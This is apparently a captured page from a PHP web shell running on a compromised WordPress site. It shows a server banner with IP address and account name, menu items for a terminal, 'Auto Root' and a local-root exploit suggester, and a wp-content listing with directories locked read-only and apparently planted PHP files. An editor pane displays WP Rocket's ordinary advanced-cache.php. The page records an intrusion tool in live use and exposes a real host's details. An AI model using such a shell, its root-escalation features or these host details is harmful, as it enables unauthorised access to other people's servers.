Linux newlinux5.pouyasazan.org 3.10.0-962.3.2.lve1.5.60.el7.x86_64 #1 SMP Fri Jul 23 07:07:00 EDT 2021 x86_64
LiteSpeed
Server IP : 88.99.66.243 & Your IP : 216.73.216.178
Domains :
Cant Read [ /etc/named.conf ]
User : wdbbsgxf
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
wdbbsgxf /
public_html /
wp-content /
Delete
Unzip
Name
Size
Permission
Date
Action
backups-dup-pro
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
cache
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
languages
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
plugins
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
smush-webp
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
themes
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
updraft
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
upgrade
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
upgrade-temp-backup
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
uploads
[ DIR ]
dr-xr-xr-x
2026-02-07 11:44
wflogs
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
wp-rocket-config
[ DIR ]
dr-xr-xr-x
2026-02-07 11:42
.htaccess
237
B
-rw-r--r--
2026-02-07 11:44
advanced-cache.php
3.36
KB
-rw-r--r--
2024-02-02 16:09
index.php
28
B
-rw-r--r--
2012-01-08 20:31
temp-write-test-66552c83b136a8-65134950
0
B
-rw-r--r--
2024-05-28 04:29
temp-write-test-672c2bb9eb4b10-82883374
0
B
-rw-r--r--
2024-11-07 06:23
temp-write-test-67f32cda534b52-17543174
0
B
-rw-r--r--
2025-04-07 05:09
temp-write-test-67f32cf4d69249-84934216
0
B
-rw-r--r--
2025-04-07 05:10
temp-write-test-68ec1a637b11d1-71326878
0
B
-rw-r--r--
2025-10-13 00:45
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-02-07 07:29
wp-cron.php
2.74
KB
-rw-r--r--
2026-02-07 07:29
Save
Rename
<?php use WP_Rocket\Buffer\Cache; use WP_Rocket\Buffer\Config; use WP_Rocket\Buffer\Tests; defined( 'ABSPATH' ) || exit; define( 'WP_ROCKET_ADVANCED_CACHE', true ); $rocket_path = '/home/wdbbsgxf/public_html/wp-content/plugins/wp-rocket/'; $rocket_config_path = '/home/wdbbsgxf/public_html/wp-content/wp-rocket-config/'; $rocket_cache_path = '/home/wdbbsgxf/public_html/wp-content/cache/wp-rocket/'; if ( version_compare( phpversion(), '7.3', '<' ) || ! file_exists( $rocket_path ) || ! file_exists( $rocket_config_path ) || ! file_exists( $rocket_cache_path ) ) { define( 'WP_ROCKET_ADVANCED_CACHE_PROBLEM', true ); return; } spl_autoload_register( function ( $class ) use ( $rocket_path ) { // phpcs:ignore Universal.NamingConventions.NoReservedKeywordParameterNames.classFound $rocket_classes = [ 'WP_Rocket\\Buffer\\Abstract_Buffer' => [ $rocket_path . 'inc/classes/Buffer/class-abstract-buffer.php' ], 'WP_Rocket\\Buffer\\Cache' => [ $rocket_path . 'inc/classes/Buffer/class-cache.php' ], 'WP_Rocket\\Buffer\\Tests' => [ $rocket_path . 'inc/classes/Buffer/class-tests.php' ], 'WP_Rocket\\Buffer\\Config' => [ $rocket_path . 'inc/classes/Buffer/class-config.php' ], 'WP_Rocket\\Logger\\HTMLFormatter' => [ $rocket_path . 'inc/Logger/HTMLFormatter.php', $rocket_path . 'inc/classes/logger/class-html-formatter.php', ], 'WP_Rocket\\Logger\\Logger' => [ $rocket_path . 'inc/Logger/Logger.php', $rocket_path . 'inc/classes/logger/class-logger.php', ], 'WP_Rocket\\Logger\\StreamHandler' => [ $rocket_path . 'inc/Logger/StreamHandler.php', $rocket_path . 'inc/classes/logger/class-stream-handler.php', ], 'WP_Rocket\\Traits\\Memoize' => [ $rocket_path . 'inc/classes/traits/trait-memoize.php' ], ]; if ( isset( $rocket_classes[ $class ] ) ) { $file_options = $rocket_classes[ $class ]; $file = ''; foreach ( $file_options as $file_option ) { if ( file_exists( $file_option ) ) { $file = $file_option; break; } } } elseif ( strpos( $class, 'WP_Rocket\\Dependencies\\Monolog\\' ) === 0 ) { $class = str_replace( 'WP_Rocket\\Dependencies\\Monolog\\', '', $class ); $file = $rocket_path . 'inc/Dependencies/Monolog/' . str_replace( '\\', '/', $class ) . '.php'; if ( ! file_exists( $file ) ) { $file = $rocket_path . 'vendor/monolog/monolog/src/' . str_replace( '\\', '/', $class ) . '.php'; } } elseif ( strpos( $class, 'WP_Rocket\\Dependencies\\Psr\\Log\\' ) === 0 ) { $class = str_replace( 'WP_Rocket\\Dependencies\\Psr\\Log\\', '', $class ); $file = $rocket_path . 'inc/Dependencies/Psr/Log/' . str_replace( '\\', '/', $class ) . '.php'; if ( ! file_exists( $file ) ) { $file = $rocket_path . 'vendor/psr/log/' . str_replace( '\\', '/', $class ) . '.php'; } } else { return; } if ( file_exists( $file ) ) { require $file; } } ); if ( ! class_exists( '\WP_Rocket\Buffer\Cache' ) ) { if ( ! defined( 'DONOTROCKETOPTIMIZE' ) ) { define( 'DONOTROCKETOPTIMIZE', true ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedConstantFound } return; } $rocket_config_class = new Config( [ 'config_dir_path' => $rocket_config_path, ] ); ( new Cache( new Tests( $rocket_config_class ), $rocket_config_class, [ 'cache_dir_path' => $rocket_cache_path, ] ) )->maybe_init_process();